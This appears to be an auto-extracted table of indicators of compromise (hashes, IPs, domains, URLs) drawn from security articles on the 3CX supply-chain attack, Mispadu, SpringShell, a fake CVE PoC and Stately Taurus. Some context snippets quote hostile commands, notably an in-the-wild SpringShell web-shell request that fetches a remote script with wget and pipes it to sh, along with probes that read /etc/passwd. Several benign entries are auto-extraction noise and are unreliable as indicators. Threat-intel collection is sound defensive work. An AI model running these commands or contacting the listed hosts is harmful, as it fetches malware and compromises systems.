Indicators of compromise
4,235 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| sha256 | f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 | b2ba4bb176396 icon5.ico hxxps://msstorageboxes[.]com/office f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 icon6.ico hxxps://officeaddons[.]com/technologies 2487b4e3c | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | f47c883f59a4802514c57680de3f41f690871e26f250c6e890651ba71027e4d3 | defa6b2d icon14.ico hxxps://glcloudservice[.]com/v1/console f47c883f59a4802514c57680de3f41f690871e26f250c6e890651ba71027e4d3 icon15.ico hxxps://pbxsources[.]com/exchange 2c9957ea04d033 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7 | 58642191deb4e68688ff973 Malicious DLL in d3dcompiler_47.dll fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7 Malicious libffmpeg.dylib a64fa9f1c76457ecc58402142a8728ce3 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://akamaitechcloudservices[ | d4c310c262a88896c57bbe3b6456bd090 icon10.ico and icon11.ico hxxps://akamaitechcloudservices[.]com/v2/storage d51a790d187439ce030cf763237e992e9196e9aa417 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://azuredeploystore[ | 74e059cf1720d77c47b97d97c3b0cf43ade5d96bf724639bd icon4.ico hxxps://azuredeploystore[.]com/cloud/services c13d49ed325dec9551906bafb6de9ec947e5ff9 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://azureonlinestorage[ | 030cf763237e992e9196e9aa41797a94956681b6279d1b9a icon12.ico hxxps://azureonlinestorage[.]com/azure/storage 4e08e4ffc699e0a1de4a5225a0b4920933fbb9cf | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://glcloudservice[ | f1d0f17e0242efd78fd4ed0c344ac6469611ec72defa6b2d icon14.ico hxxps://glcloudservice[.]com/v1/console f47c883f59a4802514c57680de3f41f690871e26f25 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://msedgepackageinfo[ | de4a5225a0b4920933fbb9cf123cde33e1674fde6d61444f icon13.ico hxxps://msedgepackageinfo[.]com/microsoft-edge 8c0b7d90f14c55d4f1d0f17e0242efd78fd4ed0 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://msstorageazure[ | e0a2b07bf4771e897fb5a617998aa4876e0e1baa5fbb8e25c icon1.ico hxxps://msstorageazure[.]com/window d459aa0a63140ccc647e9026bfd1fccd4c310c262a88896 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://msstorageboxes[ | 551906bafb6de9ec947e5ff936e7e40877feb2ba4bb176396 icon5.ico hxxps://msstorageboxes[.]com/office f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0e | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://officeaddons[ | b4f82e3f4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 icon6.ico hxxps://officeaddons[.]com/technologies 2487b4e3c950d56fb15316245b3c51fbd70717838 | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://officestoragebox[ | 68b769f333a48e228c32bcf26bd98e51310efd48e80c1789f icon2.ico hxxps://officestoragebox[.]com/api/session 268d4e399dbbb42ee1cd64d0da72c57214ac987efb | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://pbxcloudeservices[ | 0024533510ce22d71e05b20bad74d53fae158dc752a65782e icon9.ico hxxps://pbxcloudeservices[.]com/phonesystem Table 1. Icon files hosted at GitHub accou | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://pbxsources[ | 14c57680de3f41f690871e26f250c6e890651ba71027e4d3 icon15.ico hxxps://pbxsources[.]com/exchange 2c9957ea04d033d68b769f333a48e228c32bcf26bd98e | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://raw.githubusercontent[ | name includes a randomly generated number between 1 and 15: hxxps://raw.githubusercontent[.]com/IconStorages/images/main/icon[1-15].ico This request l | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://sourceslabs[ | fb15316245b3c51fbd70717838f6f82f32db2efcc4d9da6de icon7.ico hxxps://sourceslabs[.]com/downloads e059c8c8b01d6f3af32257fc2b6fe188d5f4359c308b | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://visualstudiofactory[ | ee1cd64d0da72c57214ac987efbb509c46cc57ea6b214beca icon3.ico hxxps://visualstudiofactory[.]com/workload c62dce8a77d777774e059cf1720d77c47b97d97c3b0cf | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://zacharryblogs[ | af32257fc2b6fe188d5f4359c308b3684b1e0db2071c3425c icon8.ico hxxps://zacharryblogs[.]com/feed d0f1984b4fe896d0024533510ce22d71e05b20bad74d53fae | Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | bbvanet.com.mx | bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These hosts align toward financial institutions, financ | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | hsbc.com.mx | s where ?? represents unidentified SHA256 hashes: www.??.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | hsbcnet.com | tified SHA256 hashes: www.??.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresa | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ixe.com.mx | ww1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These hosts align toward fi | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | monex.com.mx | ?.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These h | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | trilivok.com | 6 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 hxxps : //trilivok[.]com/4g3031ar0/cb6y1dh/it.php hxxp : //trilivok[.]com/4g3031ar | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| md5 | 723df0296951abd2aeed01361cec6b0d | 5a46ad4ea SHA1 ba6d10e36f41c4ebc85f6beb95afd2b7c92406ad MD5 723df0296951abd2aeed01361cec6b0d Size 4,298,240 bytes File Type PE32+ executable (GUI) x86-6 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | ba6d10e36f41c4ebc85f6beb95afd2b7c92406ad | c3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea SHA1 ba6d10e36f41c4ebc85f6beb95afd2b7c92406ad MD5 723df0296951abd2aeed01361cec6b0d Size 4,298,240 bytes F | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 018beb515d323dee4f04ad9663863324859f4eb896576dbef1df950568084030 | c4c01fa51d918be8ab40077e79b5b8dbaea098328ff953fc7aca8c2 com 018beb515d323dee4f04ad9663863324859f4eb896576dbef1df950568084030 enlace bbaba0482f486b0d7b7738af8bc4731dbb80faef7f8b3888d985 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 0332d65ee6d896d1b326748e0108b1ac1ad97e94796dd17c7e15fa10317445a9 | 498d802ce7f47739ae9d93236f83811335da55aef1dc1c17694f53 nbem 0332d65ee6d896d1b326748e0108b1ac1ad97e94796dd17c7e15fa10317445a9 nixe 974fe99972905800c1dd1a3527de58c291ed1f8f1c654f2f302d6b | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 03bdae4d40d3eb2db3c12d27b76ee170c4813f616fec5257cf25a068c46ba15f | fa82c936c5784f86106838697ab79a1f6dc243ae6721b42f0da467eaf52 03bdae4d40d3eb2db3c12d27b76ee170c4813f616fec5257cf25a068c46ba15f 1b7dc569508387401f1c5d40eb448dc20d6fb794e97ae3d1da43b571ed0 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 135c9ef3baaef856dd9ca7801bfb690a3662646ab97568e916a1af06d382b81f | 8e2cff36fc896497d4539397e8334aa9a5910e73b45bde4f7206aa5ebe3 135c9ef3baaef856dd9ca7801bfb690a3662646ab97568e916a1af06d382b81f 4c21caa1fc4c01fa51d918be8ab40077e79b5b8dbaea098328ff953fc7a | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 1b7dc569508387401f1c5d40eb448dc20d6fb794e97ae3d1da43b571ed0486a0 | e4d40d3eb2db3c12d27b76ee170c4813f616fec5257cf25a068c46ba15f 1b7dc569508387401f1c5d40eb448dc20d6fb794e97ae3d1da43b571ed0486a0 e136717630164116c2b68de31a439231dc468ddcbee9f74cca511df1036 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 3e165f375f498d802ce7f47739ae9d93236f83811335da55aef1dc1c17694f53 | d4e806daa6c5e54af96f9e7839bc2260e5f0258e5edf617a92045085 mx 3e165f375f498d802ce7f47739ae9d93236f83811335da55aef1dc1c17694f53 nbem 0332d65ee6d896d1b326748e0108b1ac1ad97e94796dd17c7e15fa | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 44c505974154050ec0c671eb2f1d27f72886243bfafff8c3523b0ce1d64f944a | 733a4eb2ebc615fbfdbc9b278aaa15ad23d661696ae54eb186a5a4 www1 44c505974154050ec0c671eb2f1d27f72886243bfafff8c3523b0ce1d64f944a www2 Table 2. Brute-forced strings used to target specific | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 46d20fa82c936c5784f86106838697ab79a1f6dc243ae6721b42f0da467eaf52 | 5289bac897e881141e281c18c606a772a53356cc81caf38e5c6296641d4 46d20fa82c936c5784f86106838697ab79a1f6dc243ae6721b42f0da467eaf52 03bdae4d40d3eb2db3c12d27b76ee170c4813f616fec5257cf25a068c46 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4a774438d15381d9ab308dd73c2917aee83897d654c39db24f4dd6f173564914 | dad213707537bdc0172509b9135115337c5744816b079390d5a3e82 www 4a774438d15381d9ab308dd73c2917aee83897d654c39db24f4dd6f173564914 ixe 4b276d43308450619fec6befdf92c5171298e3651ed6f06a5a637f8 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4b276d43308450619fec6befdf92c5171298e3651ed6f06a5a637f8a5afc407f | 15381d9ab308dd73c2917aee83897d654c39db24f4dd6f173564914 ixe 4b276d43308450619fec6befdf92c5171298e3651ed6f06a5a637f8a5afc407f monex e8deebe849f80654b53b73d41a379919a86c4c356715d34729335 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4c21caa1fc4c01fa51d918be8ab40077e79b5b8dbaea098328ff953fc7aca8c2 | ef3baaef856dd9ca7801bfb690a3662646ab97568e916a1af06d382b81f 4c21caa1fc4c01fa51d918be8ab40077e79b5b8dbaea098328ff953fc7aca8c2 We observed a total of 15 groupings of hashes for this malw | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4e209b1dd2d4eaa3b041dddbe7f1bd0c6b07145c0102999060d7ceeb64978e90 | bf7f4513b64658c751148304f287b13df26890642d64b75c264 bbvanet 4e209b1dd2d4eaa3b041dddbe7f1bd0c6b07145c0102999060d7ceeb64978e90 hsbcnet b70ad99286733a4eb2ebc615fbfdbc9b278aaa15ad23d661696 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 748a57a4d4e806daa6c5e54af96f9e7839bc2260e5f0258e5edf617a92045085 | 486b0d7b7738af8bc4731dbb80faef7f8b3888d9859726dbd53957 hsbc 748a57a4d4e806daa6c5e54af96f9e7839bc2260e5f0258e5edf617a92045085 mx 3e165f375f498d802ce7f47739ae9d93236f83811335da55aef1dc1c | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea | wn in Table 1 for our analysis: Characteristic Value SHA256 8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea SHA1 ba6d10e36f41c4ebc85f6beb95afd2b7c92406ad MD5 723df0296 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 974fe99972905800c1dd1a3527de58c291ed1f8f1c654f2f302d6b3b70af2b10 | d896d1b326748e0108b1ac1ad97e94796dd17c7e15fa10317445a9 nixe 974fe99972905800c1dd1a3527de58c291ed1f8f1c654f2f302d6b3b70af2b10 see ac027e988dad213707537bdc0172509b9135115337c5744816b0793 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | ac027e988dad213707537bdc0172509b9135115337c5744816b079390d5a3e82 | 2905800c1dd1a3527de58c291ed1f8f1c654f2f302d6b3b70af2b10 see ac027e988dad213707537bdc0172509b9135115337c5744816b079390d5a3e82 www 4a774438d15381d9ab308dd73c2917aee83897d654c39db24f4dd6f | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | b70ad99286733a4eb2ebc615fbfdbc9b278aaa15ad23d661696ae54eb186a5a4 | aa3b041dddbe7f1bd0c6b07145c0102999060d7ceeb64978e90 hsbcnet b70ad99286733a4eb2ebc615fbfdbc9b278aaa15ad23d661696ae54eb186a5a4 www1 44c505974154050ec0c671eb2f1d27f72886243bfafff8c3523b0c | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | bbaba0482f486b0d7b7738af8bc4731dbb80faef7f8b3888d9859726dbd53957 | 3dee4f04ad9663863324859f4eb896576dbef1df950568084030 enlace bbaba0482f486b0d7b7738af8bc4731dbb80faef7f8b3888d9859726dbd53957 hsbc 748a57a4d4e806daa6c5e54af96f9e7839bc2260e5f0258e5edf61 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | bc25f7836c273763827e1680856ec6d53bd73bbc4a03e9f743eddfc53cf68789 | 54dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea bc25f7836c273763827e1680856ec6d53bd73bbc4a03e9f743eddfc53cf68789 fb3995289bac897e881141e281c18c606a772a53356cc81caf38e5c6296 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | cf546a4c5c7fdd3935ed7d93f5482057e3c8ff8723c3a73caba1fc5e3a5c96b4 | ying strings, as noted below in Table 2. SHA256 Hash String cf546a4c5c7fdd3935ed7d93f5482057e3c8ff8723c3a73caba1fc5e3a5c96b4 bitso 4c21caa1fc4c01fa51d918be8ab40077e79b5b8dbaea098328ff9 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | d4fed9ca90249707099926e336c0ec5abc0be8fbeb0e1889f7259e0e7312b9a0 | 0654b53b73d41a379919a86c4c356715d34729335e79089127c7 secure d4fed9ca90249707099926e336c0ec5abc0be8fbeb0e1889f7259e0e7312b9a0 wallet d752b7472110cbf7f4513b64658c751148304f287b13df268906 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | d752b7472110cbf7f4513b64658c751148304f287b13df26890642d64b75c264 | 9707099926e336c0ec5abc0be8fbeb0e1889f7259e0e7312b9a0 wallet d752b7472110cbf7f4513b64658c751148304f287b13df26890642d64b75c264 bbvanet 4e209b1dd2d4eaa3b041dddbe7f1bd0c6b07145c0102999060d | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | dd4018e2cff36fc896497d4539397e8334aa9a5910e73b45bde4f7206aa5ebe3 | he prepended hash, resulting in the following three hashes: dd4018e2cff36fc896497d4539397e8334aa9a5910e73b45bde4f7206aa5ebe3 135c9ef3baaef856dd9ca7801bfb690a3662646ab97568e916a1af06d38 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | e136717630164116c2b68de31a439231dc468ddcbee9f74cca511df1036a22ea | 569508387401f1c5d40eb448dc20d6fb794e97ae3d1da43b571ed0486a0 e136717630164116c2b68de31a439231dc468ddcbee9f74cca511df1036a22ea Network… | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | e8deebe849f80654b53b73d41a379919a86c4c356715d34729335e79089127c7 | 450619fec6befdf92c5171298e3651ed6f06a5a637f8a5afc407f monex e8deebe849f80654b53b73d41a379919a86c4c356715d34729335e79089127c7 secure d4fed9ca90249707099926e336c0ec5abc0be8fbeb0e1889f725 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | fb3995289bac897e881141e281c18c606a772a53356cc81caf38e5c6296641d4 | 7836c273763827e1680856ec6d53bd73bbc4a03e9f743eddfc53cf68789 fb3995289bac897e881141e281c18c606a772a53356cc81caf38e5c6296641d4 46d20fa82c936c5784f86106838697ab79a1f6dc243ae6721b42f0da467 | Exploring the Latest Mispadu Stealer Variant Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | att.net | enabled? Or is the user meant not to notice a redirect from att.net to att.someotherdomain.net or something? Andrew Olpin • Aug | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| domain | att.someotherdomain.net | is the user meant not to notice a redirect from att.net to att.someotherdomain.net or something? Andrew Olpin • August 17, 2026 9:32 AM Yes, t | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| domain | foo.com | edLight • August 17, 2026 6:54 PM Uhhh. Wait a sec… I go to foo.com on my computer’s web-browswer. DNS lookup is redirected and | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| domain | www.schneier.com | em, three of the five browsers on my laptop complained that www[dot]schneier[dot]com was insecure, and somebody might be spoofing it. I | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| ipv4 | 1.2.3.4 | -browswer. DNS lookup is redirected and goes to a the wrong 1.2.3.4 ip address. As long as that IP address has a security cert, | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| ipv4 | 8.8.8.8 | in LA, what should I do – edit my android hosts file to use 8.8.8.8 to get DNS? Aim my browser at the IP address of my hosting | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · Aug 17, 2026 |
| domain | burpcollaborator.net | sswd cat+/etc/passwd id ifconfig ipconfig ping%20[redacted].burpcollaborator[.]net Observed in the Wild Our Spring Core Remote Code Executio | CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ggdd.co.uk | t general scanning activity. ls nslookup%20[redacted].test6.ggdd[.]co[.]uk nslookup+[redacted].test6.ggdd[.]co[.]uk ping%20[redact | CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| url | http://107.174.133[ | atwar.jsp?pwd=j&cmd=/bin/sh/-c${IFS}'cd${IFS}/tmp;wget${IFS}hxxp://107.174.133[.]167/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' Upon further anal | CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated) Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | outlook.com | OWA-ExplicitLogonUser that has a value of owa/mastermailbox@outlook[.]com . The header value is removed from the URL during process | Threat Brief: OWASSRF Vulnerability Exploitation Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | checkblacklistwords.eu | eation with WildFire and Advanced URL Filtering. The domain checkblacklistwords[.]eu used to host the various files needed for infection and t | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | streamable.com | . The instructions also include a link to a video hosted on streamable[.]com . The video is no longer hosted at the URL within the REA | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | 82cb695f463b93b9cc089253cd6b5e32dce46c35 | 0477 - main . zip Type = zip Physical Size = 2360 Comment = 82cb695f463b93b9cc089253cd6b5e32dce46c35 Date Time Attr Size Compressed Name ------------------- --- | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 7fc8d002b89fcfeb1c1e6b0ca710d7603e7152f693a14d8c0b7514d911d04234 | IoCs is available on our GitHub. Indicator Type Description 7fc8d002b89fcfeb1c1e6b0ca710d7603e7152f693a14d8c0b7514d911d04234 File CVE-2023-40477-main.zip ecf96e8a52d0b7a9ac33a37ac8b277 | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | b77e4af833185c72590d344fd8f555b95de97ae7ca5c6ff5109a2d204a0d2b8e | 5afd287915c50a92df244e5041715c3381733e30b666fd3b File c.ps1 b77e4af833185c72590d344fd8f555b95de97ae7ca5c6ff5109a2d204a0d2b8e File Windows.Gaming.Preview.exe - VenomRAT 94.156.253[.]109 | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | b99161d933f023795afd287915c50a92df244e5041715c3381733e30b666fd3b | f0c3d95514ac6eeaeacd8a4b62bcc32a716639f7e62cc4 File bat.bat b99161d933f023795afd287915c50a92df244e5041715c3381733e30b666fd3b File c.ps1 b77e4af833185c72590d344fd8f555b95de97ae7ca5c6ff5 | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | c2a2678f6bb0ff5805f0c3d95514ac6eeaeacd8a4b62bcc32a716639f7e62cc4 | c33a37ac8b2779f4c52a3d7e0cf8da09d562ba0de6b30ff File poc.py c2a2678f6bb0ff5805f0c3d95514ac6eeaeacd8a4b62bcc32a716639f7e62cc4 File bat.bat b99161d933f023795afd287915c50a92df244e5041715c | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | ecf96e8a52d0b7a9ac33a37ac8b2779f4c52a3d7e0cf8da09d562ba0de6b30ff | 7152f693a14d8c0b7514d911d04234 File CVE-2023-40477-main.zip ecf96e8a52d0b7a9ac33a37ac8b2779f4c52a3d7e0cf8da09d562ba0de6b30ff File poc.py c2a2678f6bb0ff5805f0c3d95514ac6eeaeacd8a4b62bcc | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| url | http://checkblacklistwords[ | e PoC code to GitHub. However, the HTTP response to the URL hxxp://checkblacklistwords[.]eu/ has a Last-Modified field that is set to Sun, 16 Jul 2 | Fake CVE-2023 Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cdn-sina.tw | ckers attempted to create a connection to the domain images.cdn-sina[.]tw to download a file named scvhost.txt . This file was a Co | Persistent Attempts at Cyberespionage Against Southeast Asian Government Target Have Links to Alloy Taurus Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | b8pjmgd6.com | pdate.fjke5oe[.]com www.i5y3dl[.]com www.hbsanews[.]com www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archi | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | fjke5oe.com | anhlab.exe C:\Users\hack\Desktop\uuid\uu\Release\uu.pdb www.fjke5oe[.]com Nov. 9, 2022 5064b2a8fcfc58c18f53773411f41824b7f6c2675c1d | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ggrdl4.com | www.hbsanews[.]com www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archives Related to PubLoad Using V6-win | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gm4rys.com | m www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archives Related to PubLoad Using V6-winsp1-wuredir SHA25 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | hbsanews.com | , an IP address linked to the known Bookworm C2 domain www.hbsanews[.]com . We also found a recent ToneShell sample compiled on Jan | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | i5y3dl.com | m Infrastructure www.fjke5oe[.]com update.fjke5oe[.]com www.i5y3dl[.]com www.hbsanews[.]com www.b8pjmgd6[.]com www.zimbra[.]page w | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | microsoft.com | ate, one of which looks like the following: http://download.microsoft[.]com/v11/2/windowsupdate/redir/v6-win7sp1-wuredir.cab We compa | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | uvfr4ep.com | , the IP address 103.27.202[.]68 resolved to the domain www.uvfr4ep[.]com . This domain hosted the C2 server for a ToneShell sample | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | zimbra.page | www.i5y3dl[.]com www.hbsanews[.]com www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archives Related to Pub | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 167a842b97d0434f20e0cd6cf73d07079255a743d26606b94fc785a0f3c6736e | 9c55efa171 april 27 updated party list.zip 123.253.35[.]231 167a842b97d0434f20e0cd6cf73d07079255a743d26606b94fc785a0f3c6736e notice re uec, (04-25-2023 day).zip 123.253.35[.]231 4fbfbf | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 243b92959cd9aa03482f3398fbe81b4874c50a5945fe6b0c0abb432a33db853f | 2a8fcfc58c18f53773411f41824b7f6c2675c1d531ffa109dc4f842119b 243b92959cd9aa03482f3398fbe81b4874c50a5945fe6b0c0abb432a33db853f a0887fa90f88dd002b025a97b3a57e4fdb7f5fdd725490d96776f8626f5 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 2a00d95b658e11ca71a8de532999dd33ddee7f80432653427eaa885b611ddd87 | load a malicious payload with a filename of BrMod104.dll ( 2a00d95b658e11ca71a8de532999dd33ddee7f80432653427eaa885b611ddd87 ). This malicious payload is a variant of PubLoad, which is | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 2bae8b07f5098e1ca8fb5a5776eb874072ace4e19734cba4af4450eeccde7f89 | 831368e6420b90210e15f72cea9171478391e15efdd608ad22fe916cea8 2bae8b07f5098e1ca8fb5a5776eb874072ace4e19734cba4af4450eeccde7f89 a229a2943cf8d1b073574f0c050ca06392d0525b2028f4b4b04d1e4b401 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
